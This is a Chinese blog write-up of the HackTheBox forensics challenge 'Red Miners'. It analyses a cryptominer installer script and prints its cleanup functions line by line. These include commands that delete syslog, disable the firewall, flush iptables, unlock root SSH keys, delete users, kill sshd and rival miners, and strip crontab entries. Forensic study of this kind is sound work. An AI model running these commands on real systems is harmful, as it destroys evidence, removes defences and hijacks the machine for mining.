HackTheBox-Forensic— Red Miners #Linux

已于 2023-12-16 09:50:49 修改
阅读量46 收藏
点赞数
文章标签: linux 运维 服务器
于 2023-12-05 20:31:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39974634/article/details/134815672
版权

给了一个miner.zip里面是一个installer_miner.sh的挖矿文件

分析语法:

cleanEnv(){ulimit -n 65535: 设置打开文件的最大数量为65535。
rm -rf /var/log/syslog: 删除/var/log/syslog日志文件。
chattr -iua /tmp/: 取消在/tmp目录上的所有文件的i(不可修改)、a(只能追加)和u(不能删除)属性。
ufw disable: 关闭防火墙。
iptables -F: 清除所有iptables规则。
echo "nope" >/tmp/log_rot: 在/tmp/log_rot文件中写入字符串"nope"。
sudo sysctl kernel.nmi_watchdog=0: 禁用内核NMI看门狗。
echo '0' >/proc/sys/kernel/nmi_watchdog: 将NMI看门狗设置为0。
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf: 将上述设置添加到sysctl配置文件中。
userdel akay: 删除名为akay的用户。
userdel vfinder: 删除名为vfinder的用户。
chattr -iae /root/.ssh/: 取消在/root/.ssh目录中的所有文件的i(不可修改)、a(只能追加)和e(扩展属性)属性。
chattr -iae /root/.ssh/authorized_keys: 取消在/root/.ssh/authorized_keys文件上的i(不可修改)、a(只能追加)和e(扩展属性)属性。
rm -rf /tmp/addres*: 删除/tmp目录下的所有以addres开头的文件。
rm -rf /tmp/walle*: 删除/tmp目录下的所有以walle开头的文件。
rm -rf /tmp/keys: 删除/tmp/keys目录及其子目录和文件。
ps aux| grep "/dot"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %: 查找正在运行的包含"/dot"的进程,并将其杀死。
pkill -f hezb: 杀死所有包含hezb的进程。
ps aux| grep "tracepath"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %: 查找正在运行的包含"tracepath"的进程,并将其杀死。
pkill -f /tmp/.out: 杀死所有包含/tmp/.out的进程。
ps aux| grep "./ll1"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %: 查找正在运行的包含"./
pkill -f sshd: 杀死所有名为 "sshd" 的进程。
pkill -f htop: 杀死所有名为 "htop" 的进程。
netstat -anp | grep ":1414" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "- " | xargs -I % kill -9 %: 查找所有监听在端口 1414 上的进程,并杀死它们。
netstat -anp | grep :14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %: 查找所有监听在端口 14444 上的进程,并杀死它们。
cat /tmp/.X11-unix/01|xargs -I % kill -9 %: 打开 /tmp/.X11-unix/01 文件并将其内容传递给 xargs 命令,然后使用 kill -9 命令杀死其中列出的所有进程。
cat /tmp/.X11-unix/11|xargs -I % kill -9 %: 类似于上一条命令,但是打开的是 /tmp/.X11-unix/11 文件。
kill -9 $(cat /tmp/.systemd.1): 打开 /tmp/.systemd.1 文件并将其内容传递给 kill -9 命令,从而杀死其中列出的进程。
cat /tmp/.pg_stat.0|xargs -I % kill -9 %: 打开 /tmp/.pg_stat.0 文件并将其内容传递给 xargs 命令,然后使用 kill -9 命令杀死其中列出的所有进程。
cat /tmp/.pg_stat.1|xargs -I % kill -9 %: 类似于上一条命令,但是打开的是 /tmp/.pg_stat.1 文件。
cat $HOME/data/./oka.pid|xargs -I % kill -9 %: 打开指定目录下的 oka.pid 文件并将其内容传递给 xargs 命令,然后使用 kill -9 命令杀死其中列出的所有进程。
pkill -f p8444: 杀死所有包含字符串 "p8444" 的进程。
pkill -f supportxmr: 杀死所有包含字符串 "supportxmr" 的进程。
pkill -f monero: 杀死所有包含字符串 "monero" 的进程。
}

cleanEnv这个函数把环境中阻碍挖矿的进程杀掉,还会检查其他挖矿的行为,如果有的话也会杀掉

cronCleanUp() {
crontab -l | sed '/base64/d' | crontab -
crontab -l | sed '/update.sh/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -
[REDACTED]
}

cronCleanUp 删除原有的计划任务,contab -l 可以列举  用sed去掉之后 crontab编辑 将修改内容保存

flag的四个部分通过搜索 == 或者"base64 -d"可以找到,经过拼接,得到最后的结果

行者孙Sun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HackTheBox-Forensic—Extraterrestrial Persistence #Linux
weixin_39974634的博客
12-05 35
WantedBy=multi-user.target #在multi-user.target启动时自动启动。[]是systemd的语法规定,用于规定节的开始和结束 一般都会有 关于服务的一般性描述和依赖关系。ExecStart=/usr/local/bin/service #服务开始时执行的命令。ExecStop=/usr/local/bin/service #服务停止时执行的命令。[Install] #定义服务与系统目标之间的关联以及启用或禁用服务时的行为。丢到hiencode解码。
HackTheBox-Forensic— Illumination #Linux #Git
weixin_39974634的博客
12-05 136
从config变量可以看到,从config.json读取了文件,解析token后进行login操作。根据注释可见token已经被替换,因为不是base64,无法在开发/生产中正常工作。首先通过ls -la找到 .git 发现这是一个git repository。通过git show 加commit id可以看到变更记录。由于这是git库,可以通过过去的日志查看被替换之前的值。查看config.json文件。
HackTheBox-Forensic-Insider #Browser #Mozilla
weixin_39974634的博客
12-05 27
给了一个压缩包,解压出来除了Firefox以外没有内容 将在这个文件夹中查找攻击者访问的内容,这个文件夹包含了火狐浏览器需要的设置和一些信息 为了排除干扰信息,建议在系统上新建一个账户,把该文件夹复制到c:\user\xxx\appdata\local\mozilla 我们启动火狐浏览器,就会自动读取目录下profile的信息 访问历史显示了攻击者登录了acc01的8080端口,可以看到攻击者访问了 password字段显示了flag
HackTheBox-Forensic—Export #Windows #Volatility
weixin_39974634的博客
12-05 37
(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。先尝试pslist列出目标系统中的进程列表。
Ubuntu-Forensic_linux_
09-30
Ubuntu operating system canconserve and manage a lot of configurationinformation and the information with forensicimportance
EnCase-Forensic取证软件完整版资料.ppt
11-14
EnCase-Forensic取证软件完整版资料 EnCase Forensic是Guidance Software公司开发的一款计算机取证软件,旨在提供计算机犯罪取证的全面解决方案。该软件提供实时预览、分析和获取,符合美国立法规范,全球最大的...
开源项目-esimov-forensic.zip
09-03
开源项目“esimov-forensic”是一个专门用于图像伪造检测的库,它为开发者和数字取证专家提供了强大的工具来鉴别图像的真伪。在现代数字时代,图像篡改技术日益普及,使得真实与虚假之间的界限变得模糊。这个库的...
Cuda-OpenCL-Forensic-Tools:使用图形卡进行取证处理
05-10
Cuda / OpenCL取证工具使用图形卡进行取证处理。 开发脚本以执行简单的取证功能,例如图像,覆盖,哈希和搜索。 该脚本的核心是Python Cuda / OpenCL。 最初的目标是测试该概念的性能。 如果性能显示出价值,那么下...
The Forensic Laboratory Handbook - Procedures and Practice
06-03
If the law has made you a witness, remain a man of science. You have no victim to avenge, no guilty or innocent person to convict or save— you must bear testimony within the limits of science.
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 275
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
Linux C | 管道open打开方式
I_feige的博客
07-12 321
1.
Linux 安装 Docker Compose
m0_63004677的博客
07-12 341
Linux 系统安装 Docker Compose
【Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 1015
收藏向 使用解析
Linux --- 高级IO
V_zjs的博客
07-12 831
Linux --- 高级IO
Linux笔记之shell终端命令后显示指定行数的grep和head
最新发布
小勇博客
07-14 500
在Linux中,grep命令和head命令常用于文本处理。grep命令用于搜索文本中的特定模式,而head命令用于显示文件的开头部分。了解如何结合这两个命令(例如使用管道)可以帮助你更高效地处理和查看文本数据。grep -A选项用于在匹配到的行之后显示指定数量的行。例如,将显示匹配到的行及其后面的三行。选项用于显示文件的前n行。例如,将显示file.txt的前五行。
Linux 入门教程 by 程序员鱼皮
努力做最接地气的编程干货分享,感谢关注
07-11 800
对初学 Linux 的同学来说,一般不会部署特别大的项目,1 核 1 G 的服务器,无论是用来学习 Linux 命令,还是用来部署个人博客和小项目都已经足够了。后续如果需要用到更高的配置,再升级即可。
【Linux 线程】线程的基本概念、LWP的理解
Hou_lang_LJ的博客
07-10 427
🐧① Linux 线程的基本概念;
【Linux】centos7安装PHP7.4报错:libzip版本过低
m0_52985087的博客
07-12 349
原因:当前服务器libzip的版本小于0.11比较低,需要更新升级,而且libzip升级版本不能是1.3.1,1.7.0的。安装完成后,查看是否存在/usr/local/lib/pkgconfig目录,如果存在,验证是否卸载成功:rpm -qa|grep libzip,如无输出信息则卸载成功。也可以直接在download后直接拼接要下载的libzip的版本。注意:只是在当前的shell会话中设置了这个环境变量。验证libzip:whereis libzip。查看服务器上libzip的版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值